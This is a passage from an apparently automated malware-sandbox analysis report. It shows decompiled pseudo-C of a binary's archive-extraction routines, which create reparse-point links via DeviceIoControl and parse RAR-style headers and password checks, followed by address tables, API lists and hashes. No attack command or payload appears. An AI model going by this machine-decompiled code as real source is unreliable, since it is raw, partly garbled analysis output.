						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E001F159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00214D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00214D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E001F943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E001F9A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E001F94DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E001FA12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E001F946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E001F6BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E001FFC98() == 0) {
										E001F1567(_t242 - 0x7c, 0x18);
										_t160 = E00200A9F(_t242 - 0x7c);
									}
								}
								E0020E214(_t160);
								E001F6E03(0x2300e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00214D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00214D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E001FB4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E001F77F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}
































          0x001f6fc6
          0x001f6fcb
          0x001f6fd5
          0x001f6fe7
          0x001f6fea
          0x001f6ff1
          0x001f6ffb
          0x001f7000
          0x001f7000
          0x001f700b
          0x001f700e
          0x001f7013
          0x001f7016
          0x001f702d
          0x001f7040
          0x001f7043
          0x001f704b
          0x001f7057
          0x001f705c
          0x001f7061
          0x001f7063
          0x001f7065
          0x001f706a
          0x001f706e
          0x001f707c
          0x001f7081
          0x001f7086
          0x001f708a
          0x001f708b
          0x001f7092
          0x001f7098
          0x001f7098
          0x001f7086
          0x001f70a0
          0x001f70ac
          0x001f70b1
          0x001f70b7
          0x001f70ba
          0x001f70c4
          0x001f70fe
          0x001f7101
          0x001f7102
          0x001f7103
          0x001f710f
          0x001f7146
          0x001f714c
          0x001f714e
          0x00000000
          0x00000000
          0x00000000
          0x001f711a
          0x001f712b
          0x001f7134
          0x001f72f4
          0x001f72f4
          0x001f72f8
          0x001f72fb
          0x001f7309
          0x001f7313
          0x001f7313
          0x001f713b
          0x001f7154
          0x001f7154
          0x001f715d
          0x001f71c5
          0x001f71c8
          0x001f71d2
          0x001f71d2
          0x001f71d5
          0x001f71dd
          0x001f71e3
          0x001f71e6
          0x001f71f1
          0x001f71f7
          0x001f7205
          0x001f720a
          0x001f720d
          0x001f7210
          0x001f7219
          0x001f722e
          0x001f723c
          0x001f723c
          0x001f723f
          0x001f7242
          0x001f725a
          0x001f725c
          0x001f7262
          0x00000000
          0x00000000
          0x001f7280
          0x001f7286
          0x001f7288
          0x001f7324
          0x001f7335
          0x001f7339
          0x001f733c
          0x001f7342
          0x001f7356
          0x001f7369
          0x001f737c
          0x001f7387
          0x001f7392
          0x001f7397
          0x001f739e
          0x001f73a4
          0x001f73a4
          0x001f73af
          0x00000000
          0x001f73af
          0x001f7292
          0x001f729d
          0x001f72a2
          0x001f72ab
          0x001f72bb
          0x001f72c2
          0x001f72ca
          0x001f72ca
          0x001f72bb
          0x001f72d6
          0x001f72df
          0x001f72eb
          0x001f72ec
          0x001f7316
          0x001f72ee
          0x001f72ee
          0x001f72ee
          0x00000000
          0x001f72ec
          0x001f71ca
          0x001f71cc
          0x00000000
          0x00000000
          0x00000000
          0x001f71cc
          0x001f715f
          0x001f7162
          0x001f716a
          0x001f7170
          0x001f7173
          0x001f717e
          0x001f7184
          0x001f7192
          0x001f7197
          0x001f719a
          0x001f719d
          0x001f71a6
          0x001f71bb
          0x00000000
          0x001f71c0
          0x001f710f
          0x001f70ca
          0x00000000
          0x00000000
          0x001f70d7
          0x001f70dc
          0x001f70de
          0x00000000
          0x00000000
          0x001f70ea
          0x001f70eb
          0x001f70ef
          0x001f70f0
          0x001f70f8
          0x00000000
          0x00000000
          0x00000000

          APIs
          • __EH_prolog.LIBCMT ref: 001F6FCB
          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001F712B
          • CloseHandle.KERNEL32(00000000), ref: 001F713B
            • Part of subcall function 001F7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 001F7A24
            • Part of subcall function 001F7A15: GetLastError.KERNEL32 ref: 001F7A6A
            • Part of subcall function 001F7A15: CloseHandle.KERNEL32(?), ref: 001F7A79
          • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 001F7146
          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001F7254
          • DeviceIoControl.KERNEL32 ref: 001F7280
          • CloseHandle.KERNEL32(?), ref: 001F7292
          • GetLastError.KERNEL32(00000015,00000000,?), ref: 001F72A2
          • RemoveDirectoryW.KERNEL32(?), ref: 001F72EE
          • DeleteFileW.KERNEL32(?), ref: 001F7316
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
          • API String ID: 3935142422-3508440684
          • Opcode ID: 81f9bdf3f33b741a3d0e18f0a30824efcf5b53afc7648e4f01983fb5520062b7
          • Instruction ID: dad251ee2871ac3830da2e1c166e18c04c6a332aaa7b195a6dfe93e6ddea3175
          • Opcode Fuzzy Hash: 81f9bdf3f33b741a3d0e18f0a30824efcf5b53afc7648e4f01983fb5520062b7
          • Instruction Fuzzy Hash: E7B1D171904218ABEF21DFA4DC45FFE77B8AF19300F0445A9FA19E7182D770AA59CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F30FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 84%
          			E001F30FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E0020D870(E002211A9, _t544);
				E0020D940();
				_t394 = _t396;
				E001FC223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E001FC42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E001FC29E(_t544 + 0x30);
						_t531 = E001FC40A(_t544 + 0x30, 4);
						_t242 = E001FC39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E001F1EF8(_t394);
							L86:
							E001F159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E001FC42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E001FC37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E001FC39E(_t498);
						_t250 = E001FC39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E001FC39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E001F1901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E001F3CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E001FA96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E001FC39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E001FC39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E001F200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E001FA8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E001FC39E(_t500);
									 *(_t539 + 0x1060) = E001FC39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E001FC39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00200A25(_t539 + 0x1040, _t502, E001FC29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E001FC29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E001FC39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E001FC39E(_t502);
											_t521 = E001FC39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E001FC300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E00201094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E001F200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00212B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E001F1F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E001F6BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E001FC39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E001FC39E(_t500) & 0x00000001;
										_t335 = E001FC251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E001FC300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E001FC300(_t544 + 0x30, _t394 + 0x2274, 8);
												E001FC300(_t544 + 0x30, _t544 + 0x64, 4);
												E001FF524(_t544 - 0x74);
												E001FF56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E001FF435(_t544 - 0x74);
												_t350 = E0020F3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E001F3E41();
										E001F3DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E001FC39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E001FC39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E001F1EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E001F6E03(0x2300e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E001F6BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E001F3DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E001F3C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E001F607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E0020F3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E001F6BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E001F6E03(0x2300e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E001F6BF5(_t563);
								E001FE797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E001F3C40(_t394);
								E001F607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00200FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































          0x001f30fc
          0x001f30fd
          0x001f3105
          0x001f310f
          0x001f3116
          0x001f311d
          0x001f3124
          0x001f3127
          0x001f3130
          0x001f3279
          0x001f3279
          0x001f327c
          0x001f3289
          0x001f329a
          0x001f32a1
          0x001f32b1
          0x001f32bb
          0x001f32bd
          0x001f32c4
          0x001f32c6
          0x001f38f6
          0x001f38f8
          0x001f38fd
          0x001f3900
          0x001f390e
          0x001f3919
          0x001f3919
          0x001f32cc
          0x001f32ce
          0x00000000
          0x00000000
          0x001f32d4
          0x001f32da
          0x001f32dc
          0x001f32dc
          0x001f32de
          0x001f32e1
          0x00000000
          0x00000000
          0x001f32e7
          0x001f32ea
          0x00000000
          0x00000000
          0x001f32f4
          0x001f32f9
          0x001f32fc
          0x00000000
          0x00000000
          0x001f3301
          0x001f3313
          0x001f3319
          0x001f331e
          0x001f3329
          0x001f332b
          0x001f3334
          0x001f333a
          0x001f3340
          0x001f3346
          0x001f3349
          0x001f334c
          0x001f334e
          0x001f3388
          0x001f3388
          0x001f338a
          0x001f3391
          0x001f3394
          0x001f3397
          0x001f33c1
          0x001f33c1
          0x001f33c8
          0x001f33ca
          0x001f33cd
          0x001f33d0
          0x001f33d5
          0x001f33da
          0x001f33dc
          0x001f33df
          0x001f33df
          0x001f33ea
          0x001f33f7
          0x001f3406
          0x001f340f
          0x001f3417
          0x001f341e
          0x001f3424
          0x001f3426
          0x001f3837
          0x001f3846
          0x001f3847
          0x001f3851
          0x001f385a
          0x001f3867
          0x001f3876
          0x001f3881
          0x001f3884
          0x001f388a
          0x001f3890
          0x001f3892
          0x001f3898
          0x001f389b
          0x001f38b2
          0x001f389d
          0x001f38a5
          0x001f38ad
          0x001f38af
          0x001f38af
          0x001f38b8
          0x001f38bf
          0x001f38c9
          0x001f38c9
          0x00000000
          0x001f38c1
          0x001f38c1
          0x001f38c7
          0x001f38cb
          0x001f38cb
          0x001f38d1
          0x001f38d6
          0x001f38d9
          0x001f38e9
          0x001f38e9
          0x001f38ee
          0x001f38f1
          0x00000000
          0x001f38f1
          0x00000000
          0x001f38c7
          0x001f38bf
          0x001f342c
          0x00000000
          0x00000000
          0x001f3432
          0x001f3435
          0x001f3577
          0x001f357f
          0x001f358e
          0x001f3592
          0x001f3595
          0x001f359c
          0x001f35a3
          0x001f35ae
          0x001f35b1
          0x001f35b7
          0x001f35c0
          0x001f35c7
          0x001f35d5
          0x001f35e0
          0x001f35ef
          0x001f35ef
          0x001f35f1
          0x001f35f7
          0x001f35fd
          0x001f3604
          0x001f360a
          0x001f360a
          0x001f3610
          0x001f3616
          0x001f361c
          0x001f3622
          0x001f3628
          0x001f362a
          0x001f3632
          0x001f3632
          0x001f3634
          0x00000000
          0x001f362c
          0x001f362c
          0x001f3636
          0x001f3636
          0x001f363f
          0x001f3645
          0x001f364a
          0x001f3651
          0x001f3654
          0x001f3667
          0x001f3667
          0x001f366c
          0x001f3673
          0x001f367a
          0x001f367f
          0x001f368e
          0x001f368e
          0x001f3694
          0x001f369e
          0x001f36a5
          0x001f36ae
          0x001f36b6
          0x001f36b9
          0x001f36bc
          0x001f36bf
          0x001f36c1
          0x001f36c1
          0x001f36d3
          0x001f36e7
          0x001f36e9
          0x001f36f3
          0x001f36f8
          0x001f36fe
          0x001f3700
          0x001f370a
          0x001f370c
          0x001f370e
          0x001f370e
          0x001f370e
          0x001f370e
          0x001f3702
          0x001f3702
          0x001f3702
          0x001f3715
          0x001f371f
          0x001f3731
          0x001f3737
          0x001f373b
          0x001f373e
          0x001f3744
          0x001f374f
          0x001f374f
          0x001f374f
          0x00000000
          0x001f3746
          0x001f3746
          0x001f3749
